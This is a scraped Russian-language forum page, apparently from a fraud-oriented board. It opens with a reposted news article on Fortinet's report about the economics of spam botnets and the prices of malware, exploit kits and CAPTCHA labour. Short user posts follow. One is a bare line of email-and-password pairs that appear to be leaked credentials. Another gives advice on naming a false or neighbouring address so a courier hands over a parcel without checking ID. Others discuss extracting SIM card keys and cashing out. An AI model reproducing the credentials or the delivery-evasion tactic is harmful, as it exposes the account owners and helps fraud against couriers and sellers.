1 баллCтарший аналитик по безопасности в подразделении FortiGuard компании Fortinet Дерек Мэнки (Derek Manky) провел больше года за отслеживанием онлайн-сообществ, в которых виртуальные злоумышленники ведут набор операторов ботнетов. Компания недавно выпустила «Отчет о киберпреступности-2013» (2013 Cybercrime Report), в котором содержится глубокий анализ организации современных спамерских ботнетов. На основе собранных данных был составлен своеобразный «рейтинг гонораров», выплачиваемых владельцам сетей зараженных компьютеров за различные операции по нелегальной рекламной рассылке или взлому. «Раньше владельцы ботнетов делали все самостоятельно», - рассказывает Мэнки. По данным отчета, сейчас ботнет - это не просто сеть зараженных ПК, управляемая злоумышленником-одиночкой или группой анонимных лиц. Рассылка спама давно превратилась в полноценный бизнес - для обслуживания своих операций ботнеты, как и легальные компании, набирают сотрудников. Управление отдельно взятым ботнетом включает в себя множество разнообразных задач. Сюда, помимо непосредственно технических операций, входят, например, консультации юристов, которые помогают оформлять теневые сделки по аренде или покупке зараженных сетей. Или услуги посредников, которые регистрируют по всему миру динамически изменяющиеся IP-адреса, чтобы максимально замаскировать местоположение и масштабы ботнета от служб по борьбе с киберпреступностью. Специалист по вводу «капчи» «Сотрудникам» криминального предприятия, оказывающим услуги ботнетам, все это приносит довольно неплохой доход. Исключение - рутинная «грязная» работа, такая как ручной ввод «капчи», для чего злоумышленники нанимают добровольцев в Сети. Если система автоматической рассылки спама натыкается на защиту от ботов, которая на большинстве веб-сайтов представлена системой CAPTCHA, у спамеров всегда готов один из таких добровольцев, который вручную вводит необходимые слова. Такие мелкие пособники нанимаются посредством онлайн-рекламы, предлагающей заработать на «вводе данных». Обходятся «специалисты по капче» дешево: за 1 000 введенных сочетаний владелец ботнета платит добровольцу $1. Однако даже такой рутинный труд, как ручной ввод «капчи», играет важную роль в ежедневных операциях спамерских сетей. От количества сотрудников, готовых заниматься такой работой, зависит эффективность обхода антиспам-защиты и масштабы рассылки, которую способен осуществлять ботнет. По словам Мэнки, владельцы ботнетов используют специализированные программные средства, для того, чтобы отслеживать производительность и исполнительскую дисциплину своих «сотрудников». В этом они мало чем отличаются от коллег-управленцев в легальном бизнесе. «Черное администрирование» Другие операции оцениваются дороже. Согласно отчету Fortinet, гонорары операторов, осуществляющих техническое обслуживание нелегальной рекламной рассылки, в зависимости от сложности задачи, могут составлять от $80 до $400. Так, технические консультации по проектированию и настройке ботнета приносят отдельно взятому «черному консультанту» в среднем от $350 до $400 долларов за одно обращение. «Черные SEO» получают около $80 за 20 000 обратных ссылок (backlinks) на рекламируемые сайты. А вот массовый перебор паролей при помощи облачных сервисов (т.н. cloud cracking) оценивается всего в $17 за 300 млн. попыток - стоит заметить, однако, что при должных мощностях перебор такого количества вариантов занимает от силы 20 минут. За внедрение вредоносного программного обеспечения платят в среднем $100 за 1 000 зараженных компьютеров. По словам Fortinet, здесь плата очень сильно зависит от региона, в котором производится внедрение. Если $100-110 - нормальная цифра для США, то в Южной и Восточной Азии, где вирусные эпидемии носят характер пандемии, за 1000 компьютеров злоумышленник получает не больше $8. Вирусные закупки Наибольшую выгоду с владельцев ботнетов, однако, объяснимо имеют разработчики вирусов и ПО для управления ботнетом и рассылки спама. Владельцы сетей зараженных ПК, по словам Fortinet, ведут активную закупку программного обеспечения, не отставая в этом от легальных организаций. За копию кода известного ботнета ZeuS владельцу спам-сети приходится выкладывать до $3 000. На втором месте по цене стоит ботнет Butterfly - $900. Цена на более простые ботнеты, чаще используемые в сетях, сдающихся под аренду клиенту (например, код армянского Bredolab, восстановленный методом реверс-инжиниринга), начинается от $50. Еще одна прибыльная ниша - само вирусное ПО: «троянец» для направленных атак с возможностью удалённого доступа к компьютеру жертвы (в частности, веб-камере) и получения скриншотов, обходится владельцу сети ботов примерно в $250 за новую версию. Столько спамер вынужден отдавать за такие известные вредоносные программы, как Gh0st RAT, Poison Ivy или Turkojan. Еще выше ценятся наборы эксплойтов: свежие версии GPack, MPack, IcePack и Eleonore приобретаются за сумму от $1,000 до $2,000. Цены на разнообразные «крипторы», «пакеры» и «биндеры» - инструменты маскировки вредоносного кода и защиты от обнаружения антивирусами - варьируются от $10 до $100. Кривое зеркало бизнеса Fortinet заключает: киберпреступность в современном мире все больше и больше превращается в отражение легального бизнеса. Дерек Мэнки приводит такой пример: на одном из форумов, который отследили специалисты FortiGuard, проводился анализ данных, собранных ботнетом из 100 000 зараженных машин с целью определить предпочтения их владельцев. «Это был полноценный интеллектуальный анализ данных», - сказал Мэнки, отметив промышленные масштабы и методы сбора и обработки. Как остановить рост ботнетов? «Помимо борьбы с организаторами, превентивным способом может стать запрет на регистрацию определенных доменов, - предлагает Fortinet. Если киберпреступность действует методами легального бизнеса, то и воздействовать на нее можно так же - при помощи юридических рычагов. «Примером может стать Китай, который после продолжительной критики по поводу неэффективной борьбы с киберпреступностью, предпринял некоторые шаги к ограничению регистрации в своей доменной зоне (.CN), в частности - необходимость её оформления на бумаге, что позволяет отслеживать тех, кто их регистрирует», - поясняет Fortinet. Другой пример - рабочая группа по борьбе с трояном Conficker. Группа нашла способ отфильтровывать домены, способные стать потенциальными источниками распространения вируса, и предупреждать их регистрацию. Подробнее: http://www.cnews.ru/...botnetov_513514
-
1 балл
-
1 баллИнфа от знакомого стаффера, которого я считаю достаточно профессиональным Спасибо за ответы.
-
1 баллНу это не выход.. Уж очень большая часть рынка на виндовозах ездит, а соответственно и софта под неё больше. Вот и приходится сидеть с под винды =)
-
1 балл
-
1 балл
-
1 балл
-
1 баллylen.kaprisse@mail.ru:2223763 ychkydyk64@mail.ru:1q2w3e
-
1 балл
-
1 балл
-
1 баллКак смотрю по соседнему ресурсу, за последний месяц произошло уже кидков 10 по следующей схеме: Злоумышленник регистрирует ник на форуме внешне на 100% схожий с никами администрации, авторитетных участников и так далее. Делается это даже не путем банальной подмены латиницы на кириллицу, а путем добавления в слова невидимого дефиса, который не отображают интернет браузеры. Например так: Имя (оригинал) И---м-я (подменка) На сайте оба варианта отображаются как Имя. Затем, злоумышленник например подыскивает тему по продаже чего-либо, и тихо по крысиному в личные сообщения прикрываясь авторитетом предлагает выдать товар по постоплате. Выявить очень просто! Если вам в личные сообщения поступает предложение подобного контекста, а именно выслать товар без денег прикрываясь авторитетом на том или ином ресурсе заходите в профиль и смотрите информацию (дату регистрации, кол-во сообщений и т.д.). Вполне очевидно, что у "авторитетного" пользователя не может быть сегодняшняя рега В общем будьте бдительны! Подобные попытки обмана могут встретиться совершенно на любом ресурсе в сети!!!
-
1 баллесли в банк не пойдешь наличить,то все гуд будет.если в банк придешь в таком виде-народ повеселишь
-
1 балл
-
1 балллично не видел, но.. брат занимается продажей сим карт в Беларуси, есть отдельные индивидуумы, которые скупают данные девайсы и перенаправляют в Польшу, Украину & etc все знают, что 128-ые легко сканируются, но, поверьте, у "фродоопастных" операторов (таковой у нас один) такого щифрования уже давно нет. т.е. это вполне современные симки, с очень сложным алгоритмом и кер пойми как, но они их ломают и выставляют многомиллионные счета.. весьма, весьма интересно, ведь в каждой "шутке есть доля шутки". так что может и неправдаподобно звучит, но KI с новых симок уходит только так. факт.
-
1 балл
-
1 баллесть, только без прошифки и хз как там все работает - дохEра деталей, как будто специально пытался мастер запутать и компоненты офигеть мелкие - даже через лупу хEр разглядишь что там написано
-
1 баллЧто за бред, зачем палить адрес! При отправке называем любой адрес для ориентира, будь то хоть жилой дом, ТРЦ (адрес) или же офис. Просим позвонить по прибытию или за 15-30 минут. Отправляем. По инструкции любой курьер должен проверить документ, НО на практике в 99.999999% этого не происходит. В случае с получением посылки в большинстве кантор ситуация аналогична! Кто ответил по телефону тот и получатель. Также дается адрес по соседству и дается указание позвонить получателю за час, за 10 минут - как требуют обстоятельства и человек выходит, и забирает спокойно. Документы у получателя попросят только если приедет в офис забирать самовывозом!